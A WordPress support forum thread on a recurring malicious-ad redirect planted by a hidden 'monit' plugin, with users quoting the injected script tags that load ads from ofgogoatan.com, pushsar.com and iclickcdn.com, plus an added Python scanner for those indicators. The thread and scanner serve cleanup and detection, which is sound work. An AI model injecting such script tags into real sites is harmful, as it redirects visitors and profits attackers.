• Resolved theone211

    (@theone211)


    Hello,
    First, thanks for this perfect plugin, it helped me a lot and solved many problems with Malware and DB injections.

    My troubles began like this: Redirecting from my site when someone clicks on a picture, menu or anywhere. When I’m logged in as an admin, it doesn’t redirect. That’s why I didn’t notice the problem.
    2 days ago
    – Adwords disabled all ads (Malware detected)
    – Sucuri scanning critical warning “Rogueads – Malware”, infected file I think was “404javascript file”, I don’t remember the exact name. I could not find it anywhere on the server to delete it.

    Cleaning:
    PHASE 1. Wordfence – Found “Rogueads – Malware issue” – DELETED – After cleaning Sucuri Rogueads Malware appeared again.
    PHASE 2. after that I checked with your plugin and found this:
    cache/…/3rd-party dir found “pushsar.com-pfe-current-tag.min” – deleted
    plugins/root dir found “monit.php” (Monitization plugin) – deleted
    “admin_ips.txt” writes all my admin IP addresses – deleted
    DB Injections: NtBiZLQDoptions:361339:"ad_code" <script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async data-cfasync="false"></script> – DELETED
    after all this NO Warning Sucuri

    BUT on new scan:
    PHASE 1. Wordfence does not detect anything.
    PHASE 2. with your plugin AGAIN detect ONLY DB Injections: NtBiZLQDoptions:361339:"ad_code" <script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3260072" async data-cfasync="false"></script> – DELETED
    “admin_ips.txt” file is also created AGAIN – I don’t know if it’s normal for this file to be created at all.

    I’m losing my nerve with this malware.

    Thank you in advance

    • This topic was modified 4 years, 6 months ago by theone211.
Viewing 15 replies - 16 through 30 (of 41 total)
  • Update:
    The following files were found being re-injected into the site (Wordfence plugin).
    However, these were found with daemon owner; I had to change the owner and delete them. But they are still found being re-injected.

    directory:
    wp-content/wflogs/

    screenshot of the files found:
    https://ibb.co/kD9WbMp

    • This reply was modified 4 years, 6 months ago by tozaorg.

    I’m having the same issues described in this topic (ofgogoatan redirect) but running scans does not reveal anything harmful.

    I have, however, discovered a multitude of .php files created about 10 days ago that contain the same content within the file and take the name of the folder they are placed in. These include names like “fonts.php”, “structure.php”, “images.php”, and so on. Some are just labeled “index.php” and again, contain the same text inside.

    I’m going to delete these files and see if anything changes. I have the structures.php file here if anyone is interested in taking a look: https://www.mediafire.com/file/3wvmudbyu9gs12k/structure.php/file

    Hi Eli, needless to say your plugin is great.

    I’ve been dealing with this issue for the past few weeks. Same scenario as other members (Wordfence not detecting it but Sucuri does).

    Here’s MY EXPERIENCE AND SOLUTION so far:

    Injected files on folder: wp-content / plugins

    1) monit.php / Ofgogoatan code was injected here. You must EDIT out those lines.
    2) admin_ips.txt / DELETE it, it’s not functional whatsoever. If you delete it but leave monit.php unchanged this file will be regenerated.

    Just emailed you the code and I’ll repost if issue is reproduced in the coming days.

    Thanks!

    Same issue, wf; still no solutions, still it is there. Did everything mentioned here.

    Plugin Author Eli

    (@scheeeli)

    @superzambezi,
    Thanks for posting the full contents of that file. This was not at all the same threat as everyone else in this thread was talking about, but it was a new threat that I had not seen before, so I added it to my definition updates and it too can now be automatically found and fixed using my plugin with the latest definitions.

    @tozaorg,
    Your screenshots only show a bit of the malicious code but it looks like the same thing almost everyone else here was dealing with, and it is already in my definitions, so if you make sure that you have the latest definition updates and run the complete scan again then my plugin should find it and remove it. If you have anything else that was not found by my plugin then please post the full contents of the infected files or send them to me directly: eli AT gotmls DOT net

    @sahilkumargaba,
    Really? It sounds like you are just advertising yourself here and were smart enough to not mention money up front. If you have something helpful to contribute or if you know of a specific solution that worked for you then please feel free to post the details here, as @cyrse did, because it might be helpful to others who are having the same issue.

    @ahmedmustafahashmi,
    If your issue is truly the same then something here should have worked for you, as this issue is already resolved. Also, if you want more help with your specific issue you should post more details so that we can assess your situation and provide helpful suggestions. Posting URLs to relevant info or screenshots of the scan results can usually be very helpful too.

    Also, please note that this topic was resolved because my plugin can detect and remove this threat for you automatically, and if you are having any issues with my plugin you can also contact me directly for free support or you can post your questions on my own forum at https://gotmls.net/support/forum/

    @tozaorg did you try a backup restore or did you just delete the template files? If you have sub domains or directories the file will most probably appear there.

    If you just delete the monit file I believe you will have issues accessing your wp-admin. Hopefully the plugin will be able to fully resolve the malware problem.

    Hi guys, we found the files appearing again and again, even after cleaning the site. Anyone solved this? I was advised to change hosting since users experiencing the issue took that step and solved the problem.

    Any thoughts?

    Hello good day everyone, a week ago I discovered on my site those ads and for those who do not know them they are similar to these:
    https://ibb.co/4ZTXKzx

    That’s right, it is about ofgogoatan.com, I recently created my website and just last week those ads appeared to me, today I have installed the Anti-Malware plugin from GOTMLS.NET and so far, it is the solution I have found, the ofgogoatan’s ads have disappeared and are apparently stored in the monit.php file:
    https://ibb.co/0C1jBwK

    I hope that my site will not be infected again, today I will clean it and hopefully it will stay that way.

    To finish, friend @scheeeli a question: Do I have to delete the scripts that appear in the ad code or is it not necessary?
    https://ibb.co/F6cYBRt

    I hope you can help me, I am new to WordPress. Greetings from Peru.

    Hello,
    I have the same issue here with this code:

    <meta name="propeller" content="0d1ba639c78d2bf91cbfe52d30bdfff2">
    <script src="https://pushsar.com/pfe/current/tag.min.js?z=3305143" data-cfasync="false" async></script>
    <script type="text/javascript" src="//ofgogoatan.com/apu.php?zoneid=3305137" async data-cfasync="false"></script>

    Each day I find it written in theme/header.php…
    Sometimes I find code in my functions.php file…

    I’ve changed host credentials, WordPress admin credentials…
    I’m really starting to get mad with this f*** malware!!
    How can I check in the database if code was written somewhere?

    Really need a solution.
    Please help.

    PS: code from propeller ads network, I’ve contacted them and they don’t do anything to block the hacker account…

    I can’t find any file name monit.php

    I can’t access this URL “my_domain/wp-admin/options-general.php?page=monit”; this page displays the message: “Sorry, you are not allowed to access this page.”

    Still, the issue is there, not resolved.

    Today no detection by “Anti-Malware from GOTMLS.NET” and Sucuri, but still new code in the header:

    <meta name="propeller" content="0d1ba639c78d2bf91cbfe52d30bdfff2">
    <script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3305137,document.body||document.documentElement)</script>

    @descargandolo Did you use original plugin and theme files? The root cause for this is using files downloaded from non-official sites.

    Removing the malware with the gotmls plugin will resolve the problem but you will need to manually clear database files. Otherwise Google will still pick up malicious code.

    @sahilkumargaba after running scan, the URL is still injected in DB, usually can be found in information_schema process table. No harm is being done at this point but Google will still read the malicious URL. Sent you an email regarding this point.

    Plugin Author Eli

    (@scheeeli)

    @ahmedmustafahashmi,
    Please read my response this time: if you want help with your specific issue you should post some details so that we can provide helpful suggestions relevant to your problem. It does no good to just say “same here” when everyone else is presenting specific problems and getting solutions that should be helping you too if you have the same issue. Posting a URL to your infected pages or screenshots of the scan results can also be very helpful.

    @neocraft,
    As you describe your infection: no file named monit.php; no page at the URL …/wp-admin/options-general.php?page=monit ; and the scripts you found in your theme’s header.php or functions.php file. So, this is not the same infection that everyone else is talking about here in this thread. You don’t have these scripts injected into your DB; you have some hacker writing these scripts into your theme files. These scripts generate ads from an ad network and hackers are making money by injecting ads with their key into thousands of sites using many different methods, not just this hidden monit plugin. However, I have added these new variants to my definition updates so that those ads can be automatically removed from your theme files too using my plugin now.

    @descargandolo,
    If you can still access the setting page at …/wp-admin/options-general.php?page=monit then you have not removed the hidden plugin yet. You need to remove the plugin plus all the script tags that were injected into your DB content. My plugin should be able to do all this for you automatically when you run the complete scan if you have downloaded the latest definition updates.

    @josecarlostf,
    Yes, hosting matters … a lot. Many of these instances of people getting reinfected again after they have completely cleaned their site are because they are on a shared hosting environment that simply allows these types of infections to spread from one site to another. This kind of circular infection pattern can continue indefinitely if it is not addressed on all the affected sites at once. For those that cannot stay clean and keep getting hit with the same threat it is sometimes best to move to a more secure hosting environment.

    @sahilkumargaba,
    Dude, I told you before. This is not a place to phish for leads. If you need work then advertise, but not here. If you have a solution then post it already and stop trying to bait these victims into emailing you for some miraculous fix. If the forum moderators see these posts of yours they will probably ban you. I see you have been phishing on other threads too and even asking for other people’s wp-admin logins on the forum, not cool.
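
Added example, not part of the original thread and not code from any plugin mentioned in it: a small Python scanner for the indicators posters quote above (the three ad domains, the propeller meta tag, and monit.php / admin_ips.txt sitting in the plugins folder). It can be pointed at a copy of the site files or at a folder holding a SQL dump of the database; the function names and the list of file extensions are assumptions.

```python
import os
import re

# Indicators quoted by posters in this thread (ad domains and the meta tag name).
AD_DOMAINS = ("ofgogoatan.com", "pushsar.com", "iclickcdn.com")
DOMAIN_RE = re.compile(
    r"(?:https?:)?//(?:[\w-]+\.)*(" + "|".join(map(re.escape, AD_DOMAINS)) + r")\b",
    re.IGNORECASE,
)
META_RE = re.compile(r'<meta[^>]+name\s*=\s*["\']?propeller', re.IGNORECASE)
# Files the posters found directly in wp-content/plugins.
DROPPED_FILES = {"monit.php", "admin_ips.txt"}
# Assumption: text-like files worth reading, including .sql database dumps.
TEXT_EXT = (".php", ".js", ".html", ".htm", ".sql", ".txt")


def scan_text(text):
    """Return the sorted list of indicator names present in a string."""
    hits = {m.group(1).lower() for m in DOMAIN_RE.finditer(text)}
    if META_RE.search(text):
        hits.add("meta:propeller")
    return sorted(hits)


def scan_tree(root):
    """Walk a directory tree and return {relative_path: [indicators]}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            hits = []
            # Flag the dropped files by name, but only in a "plugins" folder.
            if name in DROPPED_FILES and os.path.basename(dirpath) == "plugins":
                hits.append("dropped-file")
            if name.lower().endswith(TEXT_EXT):
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits += scan_text(fh.read())
            if hits:
                report[rel] = hits
    return report


if __name__ == "__main__":
    # Constructed sample modelled on the tag quoted in the thread (zoneid is made up).
    sample = '<script src="//ofgogoatan.com/apu.php?zoneid=0" async></script>'
    print(scan_text(sample))
```

A clean result only means these specific strings are absent; variants using other domains, as the plugin author notes for the theme-file case, need their own patterns.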

    GROVLY

    (@sahilkumargaba)

    @scheeeli What do you mean by other threads, the one where I asked for details 3 years ago? And by the way this is the third message which I posted on the forum. GOT IT

    If you think what I’m doing is wrong I’ll not post to your forum again.

    I found this forum on Google while searching for how to remove monit.php malware from the website. But after using your plugin it doesn’t completely remove the malware from the website.

    After researching I found the way to remove the malware from the website completely.

    If you want to know how we removed the malware from the website you can contact me on my email which is given in my previous message.

  • The topic ‘DB Injection appears again and again…’ is closed to new replies.